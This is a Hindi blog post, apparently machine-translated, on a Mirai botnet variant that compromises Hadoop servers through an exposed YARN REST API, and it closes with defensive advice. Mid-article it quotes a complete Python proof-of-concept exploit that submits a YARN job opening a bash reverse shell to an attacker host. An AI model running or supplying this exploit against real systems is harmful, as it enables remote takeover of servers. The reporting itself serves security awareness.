IoT को छोड़कर: Mirai botnet ने Linux मशीनों पर हमला किया

मिराई बॉटनेट 2016 में दिखाई दिया और कुछ ही समय में 600 हजार से अधिक IoT उपकरणों को संक्रमित करने में कामयाब रहा। पिछले हफ्ते, यह मिराई के नए संस्करण के बारे में ज्ञात हो गया , जिसका उद्देश्य हैडॉप के साथ लिनक्स-सर्वर है। हम यह पता लगाते हैं कि वायरस किस भेद्यता का उपयोग करता है और इसे "कैसे कवर करें"।


/ फ़्लिकर / डीजे शिन / सीसी बाय-एसए

मिराई के बारे में कुछ शब्द

मिराई को हाई-प्रोफाइल हमलों की एक श्रृंखला के लिए जाना जाता है। बॉटनेट बिक्री पर एक लेख प्रकाशित करने के बाद पत्रकार ब्रायन क्रेब्स के ब्लॉग पर एक था। दूसरा बड़े DNS प्रदाता Dyn पर है , जिसने दुनिया की सेवाओं में खराबी पैदा की: ट्विटर, Reddit, PayPal, GitHub और कई अन्य।

IoT उपकरणों को "कैप्चर" करने के लिए, बोटनेट ने एक कमजोर पासवर्ड भेद्यता का इस्तेमाल किया (निर्माताओं ने उन्हें सभी स्मार्ट उपकरणों के लिए समान बनाया)। मैलवेयर ने खुले टेलनेट बंदरगाहों के लिए इंटरनेट की निगरानी की और डिवाइस के मालिक के खाते तक पहुंचने के लिए ज्ञात लॉगिन-पासवर्ड जोड़े में क्रूरता से प्रवेश किया। यदि सफल हुआ, तो गैजेट "दुर्भावनापूर्ण नेटवर्क" का हिस्सा बन गया।

2016 के अंत में, डेवलपर्स ने वायरस के स्रोत कोड को नेटवर्क में पोस्ट किया। इसने दुर्भावनापूर्ण सॉफ़्टवेयर के कई और संस्करणों के उभरने का नेतृत्व किया, लेकिन इन सभी ने अपने लक्ष्य को इंटरनेट ऑफ़ थिंग्स का उपकरण बना दिया। कुछ समय पहले तक, मिरी कीड़ा अब पैदा हो गया है, जो डेटा केंद्रों में लिनक्स सर्वर पर हमला करता है।

बोटनेट "भर्ती" लिनक्स

मिराई के नए संस्करण की रिपोर्ट को NETSCOUT में सूचना सुरक्षा विशेषज्ञों द्वारा प्रकाशित किया गया था। यह ज्ञात है कि Apache Hadoop ढांचे के साथ एक बोटनेट सर्वर पर हमला करता है। जैसा कि सुरक्षा विशेषज्ञों का कहना है, हैकर्स लोहे की शक्ति से आकर्षित होते हैं। Hadoop का उपयोग उच्च-प्रदर्शन कंप्यूटिंग सर्वर और मशीन लर्निंग एल्गोरिदम पर किया जाता है। उत्पादक उपकरणों का एक नेटवर्क अधिक विनाशकारी DDoS हमलों की अनुमति देगा।

लिनक्स के लिए मिरी संस्करण अभी भी टेलनेट फैक्ट्री क्रेडेंशियल्स द्वारा हैकिंग सिस्टम है। लेकिन अब कार्यक्रम को IoT गैजेट्स के विभिन्न प्रकार के आर्किटेक्चर के बीच अंतर करने की आवश्यकता नहीं है, मिरी केवल x86 प्रोसेसर वाले सर्वर पर हमला करता है।

इसी समय, नया बॉटनेट हैक किए गए डिवाइस पर मैलवेयर को स्वयं स्थापित नहीं करता है। कृमि हमलावरों को कमजोर मशीन का आईपी पता और इसके लिए उपयोगकर्ता नाम और पासवर्ड की एक जोड़ी भेजता है। फिर, हैकर्स डीडीओएस बॉट्स को मैन्युअल रूप से इंस्टॉल करते हैं।

क्या भेद्यता का उपयोग किया जाता है

मैलवेयर YARN मॉड्यूल की भेद्यता का शोषण करता है, जो सर्वर को घुसपैठ करने के लिए Apache Hadoop में क्लस्टर संसाधनों और शेड्यूलिंग कार्यों के प्रबंधन के लिए जिम्मेदार है।

यदि YARN कॉन्फ़िगरेशन गलत है, तो हमलावर पोर्ट 8088 और 8090 के माध्यम से सिस्टम के आंतरिक रीस्ट एपीआई तक पहुंच प्राप्त कर सकता है। दूरस्थ रूप से कनेक्ट करके, एक हमलावर क्लस्टर में एक नया एप्लिकेशन जोड़ने में सक्षम है। वैसे, यह समस्या कई वर्षों से जानी जाती है - एक्सप्लॉइटबीडी और गिटहब पर पीओसी के कारनामों को प्रकाशित किया गया है ।

उदाहरण के लिए, GitHub पर निम्नलिखित शोषण कोड प्रस्तुत किया गया है:

#!/usr/bin/env python import requests target = 'http://127.0.0.1:8088/' lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) 

मिराई के अलावा, इस भेद्यता का उपयोग एक अन्य DDoS बॉट - डेमनबोट द्वारा किया जाता है, जिसे रेडवेयर के विशेषज्ञों ने अक्टूबर में खोजा था। शरद ऋतु की शुरुआत के बाद से, उन्होंने दैनिक YARN भेद्यता के माध्यम से एक लाख हैकिंग प्रयासों में प्रवेश किया है।

क्या कहते हैं विशेषज्ञ

सूचना सुरक्षा विशेषज्ञों के अनुसार, संयुक्त राज्य अमेरिका, ग्रेट ब्रिटेन, इटली और जर्मनी में सबसे अधिक प्रयास हैक किए गए थे। महीने की शुरुआत में, दुनिया भर में बस एक हजार से अधिक सर्वर YARN में कमजोरियों से प्रभावित थे। यह ज्यादा नहीं है, लेकिन उन सभी में उच्च कंप्यूटिंग शक्ति है।

ऐसी जानकारी भी है कि Hadoop में एक असुरक्षा असुरक्षित सर्वर पर संग्रहीत डेटा तक पहुंच के साथ हमलावरों को प्रदान कर सकती है। अब तक, इस तरह के कोई मामले सामने नहीं आए हैं, लेकिन विशेषज्ञों ने चेतावनी दी है कि यह केवल समय की बात है।

मिराई का नया संस्करण तेजी से नहीं फैल रहा है - हर दिन YARN के माध्यम से Hadoop-Machines को क्रैक करने के हजारों प्रयासों के केवल कई हैं। इसके अलावा, सभी हमले आईपी पते की एक छोटी संख्या से आते हैं - चालीस से अधिक नहीं।


/ फ़्लिकर / जेलीन मॉरिस / सीसी बाय

हमलावरों के इस तरह के व्यवहार ने NETSCOUT विशेषज्ञों को इस विचार के लिए प्रेरित किया कि वायरस स्वचालित रूप से नहीं फैलता है - हैकर्स मैन्युअल रूप से इंटरनेट को स्कैन करते हैं और असुरक्षित मशीनों के लिए कार्यक्रम को तैनात करते हैं। इसका मतलब है कि स्थापित Hadoop वाले सर्वरों के पास भेद्यता को बंद करने के लिए अधिक समय है।

हमले से बचाने के लिए, आपको नेटवर्क सुरक्षा सेटिंग्स को बदलने की आवश्यकता है । यह कंप्यूटिंग क्लस्टर तक पहुंच को प्रतिबंधित करने के लिए प्रशासकों के लिए पर्याप्त है - आईपी फिल्टर को कॉन्फ़िगर करने या बाहरी उपयोगकर्ताओं और अनुप्रयोगों से नेटवर्क को पूरी तरह से बंद करने के लिए।

सिस्टम में अनधिकृत पहुंच को रोकने के लिए, सुरक्षा विशेषज्ञ भी Hadoop को संस्करण 2.x में अपग्रेड करने और Kerberos प्रोटोकॉल के माध्यम से प्रमाणीकरण सक्षम करने की सलाह देते हैं।

---

वीएएस विशेषज्ञों के ब्लॉग से कई पोस्ट:

• राउटर के माध्यम से बोटनेट स्पैम - आपको क्या जानना चाहिए
• IPv6 कार्यान्वयन - इंटरनेट सेवा प्रदाताओं के लिए अक्सर पूछे जाने वाले प्रश्न
• DDOS और 5G: अधिक "पाइप" - अधिक समस्याएं

Habré पर हमारे ब्लॉग से ताजा सामग्री की एक जोड़ी:

• वे इलोना मास्क से स्टारलिंक - सैटेलाइट इंटरनेट कैसे लॉन्च करेंगे
• टीसीपी को बदलने के लिए: QUIC कार्यान्वयन के लिए तैयार है [लेकिन RFC बनने के लिए तैयार नहीं]